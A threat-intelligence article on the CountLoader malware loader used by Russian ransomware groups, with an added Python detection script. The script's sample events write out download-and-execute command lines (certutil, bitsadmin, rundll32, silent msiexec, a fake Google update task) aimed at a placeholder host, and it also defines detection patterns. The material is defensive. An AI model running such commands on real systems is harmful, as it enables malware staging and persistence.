CountLoader Expands Russian Ransomware Operations with Versatile Malware Loader

Cybersecurity researchers have identified a new malware loader, dubbed CountLoader, actively utilized by Russian ransomware groups to deploy post-exploitation tools such as Cobalt Strike, AdaptixC2, and the remote access trojan PureHVNC RAT. According to Silent Push, CountLoader is employed either as part of an Initial Access Broker’s (IAB) toolkit or by ransomware affiliates linked to the LockBit, Black Basta, and Qilin ransomware groups.

Multiple Versions and Delivery Methods

CountLoader exists in three distinct versions: .NET, PowerShell, and JavaScript. Kaspersky had previously identified the PowerShell variant, which was distributed through DeepSeek-themed decoys that trick users into installing it. Those campaigns went on to deploy an implant named BrowserVenom, which reconfigures every browser instance on the host to route its traffic through an attacker-controlled proxy, enabling traffic manipulation and data collection.

JavaScript Variant: Advanced Capabilities

The JavaScript version of CountLoader is the most sophisticated of the three, offering six methods for downloading files and three for executing the malware binaries it retrieves. It includes a predefined function that identifies a victim's device from Windows domain information. It can also gather system information, establish persistence by creating a scheduled task that mimics a Google Chrome update, and contact a remote server for further instructions. Those instructions cover downloading and executing DLL and MSI installer payloads through rundll32.exe and msiexec.exe, transmitting system metadata, and deleting the scheduled task it created. The six download methods rely on curl, PowerShell, MSXML2.XMLHTTP, WinHTTP.WinHttpRequest.5.1, bitsadmin, and certutil.exe.

Use of Living-Off-the-Land Binaries (LOLBins)

CountLoader’s developers demonstrate an advanced understanding of the Windows operating system and of malware development by relying on Living-Off-the-Land Binaries (LOLBins) such as ‘certutil’ and ‘bitsadmin.’ They also implement a PowerShell generator that encrypts commands on the fly, which makes the loader harder to detect and more effective.
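The behaviours described above (downloads through certutil, bitsadmin, curl and PowerShell; DLL and MSI payloads launched via rundll32.exe and msiexec.exe; a scheduled task posing as a Google Chrome update) are exactly what a detection engineer would turn into rules. The script below is an added example and is not code from the Silent Push report or from any CountLoader sample. It runs a small rule set over constructed process-creation events shaped like Sysmon Event ID 1 fields (Image, CommandLine, ParentImage); every command line, path and TEST-NET address in the sample is invented, and the rule names and thresholds are assumptions.

```python
"""Rule-based triage of Windows process-creation events for CountLoader-style
LOLBin downloads and fake-Chrome-update persistence. Added example; sample
events are constructed to look like Sysmon Event ID 1 fields, not real telemetry."""
import re

# Constructed sample events (hypothetical hosts, TEST-NET address, invented file names).
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\certutil.exe",
     "CommandLine": r"certutil.exe -urlcache -split -f http://203.0.113.10/u.dat C:\Users\Public\u.dat",
     "ParentImage": r"C:\Windows\System32\wscript.exe"},
    {"Image": r"C:\Windows\System32\bitsadmin.exe",
     "CommandLine": r"bitsadmin /transfer upd /download /priority normal http://203.0.113.10/u.dll %TEMP%\u.dll",
     "ParentImage": r"C:\Windows\System32\wscript.exe"},
    {"Image": r"C:\Windows\System32\schtasks.exe",
     "CommandLine": r'schtasks /create /sc minute /mo 5 /tn "GoogleUpdateTaskMachineCore" /tr "wscript.exe C:\Users\alice\AppData\Roaming\upd.js" /f',
     "ParentImage": r"C:\Windows\System32\wscript.exe"},
    {"Image": r"C:\Windows\System32\rundll32.exe",
     "CommandLine": r"rundll32.exe C:\Users\alice\AppData\Local\Temp\u.dll,Start",
     "ParentImage": r"C:\Windows\System32\wscript.exe"},
    {"Image": r"C:\Windows\System32\msiexec.exe",
     "CommandLine": r"msiexec /i C:\Users\alice\AppData\Local\Temp\u.msi /qn",
     "ParentImage": r"C:\Windows\System32\wscript.exe"},
    # Benign: the real Google updater task, registered from Google's install path.
    {"Image": r"C:\Windows\System32\schtasks.exe",
     "CommandLine": r'schtasks /create /tn "GoogleUpdateTaskMachineUA" /tr "C:\Program Files (x86)\Google\Update\GoogleUpdate.exe /ua" /sc daily',
     "ParentImage": r"C:\Program Files (x86)\Google\Update\GoogleUpdate.exe"},
    # Benign: certutil used for hashing, no URL involved.
    {"Image": r"C:\Windows\System32\certutil.exe",
     "CommandLine": r"certutil -hashfile C:\tools\setup.exe SHA256",
     "ParentImage": r"C:\Windows\System32\cmd.exe"},
]

URL = re.compile(r"https?://", re.I)
# Locations a low-privileged loader can write to; a DLL/MSI launched from here is suspicious.
USER_WRITABLE = re.compile(
    r"\\(Users\\[^\\]+\\AppData|Users\\Public|Windows\\Temp|ProgramData)\\|%TEMP%|%APPDATA%", re.I)
PS_DOWNLOAD = re.compile(r"downloadfile|downloadstring|invoke-webrequest|\biwr\b|webclient", re.I)
TASK_NAME = re.compile(r'/tn\s+"?([^"\s]+)"?', re.I)
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe", "mshta.exe", "powershell.exe"}


def basename(path):
    """Lower-cased file name of a Windows path."""
    return path.rsplit("\\", 1)[-1].lower()


def detect(event):
    """Return the list of rule names an event triggers (empty list if none)."""
    image = basename(event.get("Image", ""))
    cl = event.get("CommandLine", "")
    low = cl.lower()
    hits = []
    # Download-by-LOLBin rules: binary name plus an http(s) URL on its command line.
    if image == "certutil.exe" and "-urlcache" in low and URL.search(cl):
        hits.append("certutil_url_download")
    if image == "bitsadmin.exe" and "/transfer" in low and URL.search(cl):
        hits.append("bitsadmin_url_download")
    if image == "curl.exe" and URL.search(cl):
        hits.append("curl_download")
    if image == "powershell.exe" and URL.search(cl) and PS_DOWNLOAD.search(cl):
        hits.append("powershell_url_download")
    # Execution rules: payloads staged in user-writable locations or pulled by URL.
    if image == "rundll32.exe" and USER_WRITABLE.search(cl):
        hits.append("rundll32_user_writable_dll")
    if image == "msiexec.exe" and (URL.search(cl) or USER_WRITABLE.search(cl)):
        hits.append("msiexec_user_writable_or_url")
    # Persistence rule: a "Google"/"Chrome" task whose action does not live under Program Files.
    if image == "schtasks.exe" and "/create" in low:
        m = TASK_NAME.search(cl)
        name = m.group(1).lower() if m else ""
        if ("google" in name or "chrome" in name) and "\\program files" not in low:
            hits.append("fake_chrome_update_task")
    # Context: a script host (the JS variant runs under wscript/cscript) as the parent raises confidence.
    if hits and basename(event.get("ParentImage", "")) in SCRIPT_HOSTS:
        hits.append("parent_is_script_host")
    return hits


def scan(events):
    """Return (index, image basename, hits) for each event that triggers at least one rule."""
    results = []
    for i, e in enumerate(events):
        hits = detect(e)
        if hits:
            results.append((i, basename(e.get("Image", "")), hits))
    return results


if __name__ == "__main__":
    for idx, img, hits in scan(SAMPLE_EVENTS):
        print(f"event {idx}: {img}: {', '.join(hits)}")
```

Two caveats matter in practice. The COM-based download methods the report lists (MSXML2.XMLHTTP and WinHTTP.WinHttpRequest.5.1) run inside the script host and never spawn a child process, so they are invisible to process-creation rules; they surface instead as network connections from wscript.exe or cscript.exe (Sysmon Event ID 3 or equivalent EDR telemetry), which is why the script-host parent is tracked as a corroborating signal. And the scheduled-task rule deliberately exempts actions under Program Files so that the genuine Google updater task is not flagged; tune that exemption to the installer paths actually used in your environment.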

Infrastructure and Deployment

The malware operates through an infrastructure comprising over 20 unique domains, serving as a conduit for Cobalt Strike, AdaptixC2, and PureHVNC RAT. PureHVNC RAT, a commercial offering from a threat actor known as PureCoder, is a predecessor to PureRAT, also referred to as ResolverRAT.

Social Engineering Tactics

Recent campaigns distributing PureHVNC RAT have employed the ClickFix social engineering tactic, luring victims with fake job offers. The trojan is deployed via a Rust-based loader, which lets attackers run malicious PowerShell code through the ClickFix phishing technique. PureCoder uses a rotating set of GitHub accounts to host the files that support PureRAT's functionality.

Interconnected Russian Ransomware Landscape

The DomainTools Investigations team has uncovered the interconnected nature of the Russian ransomware landscape, tracing threat actor movements across groups and the shared use of tools such as AnyDesk and Quick Assist, which suggests operational overlaps. Operators adapt to market conditions and reorganize in response to takedowns, and trust relationships are critical: these individuals choose to work with people they know, regardless of the organization's name.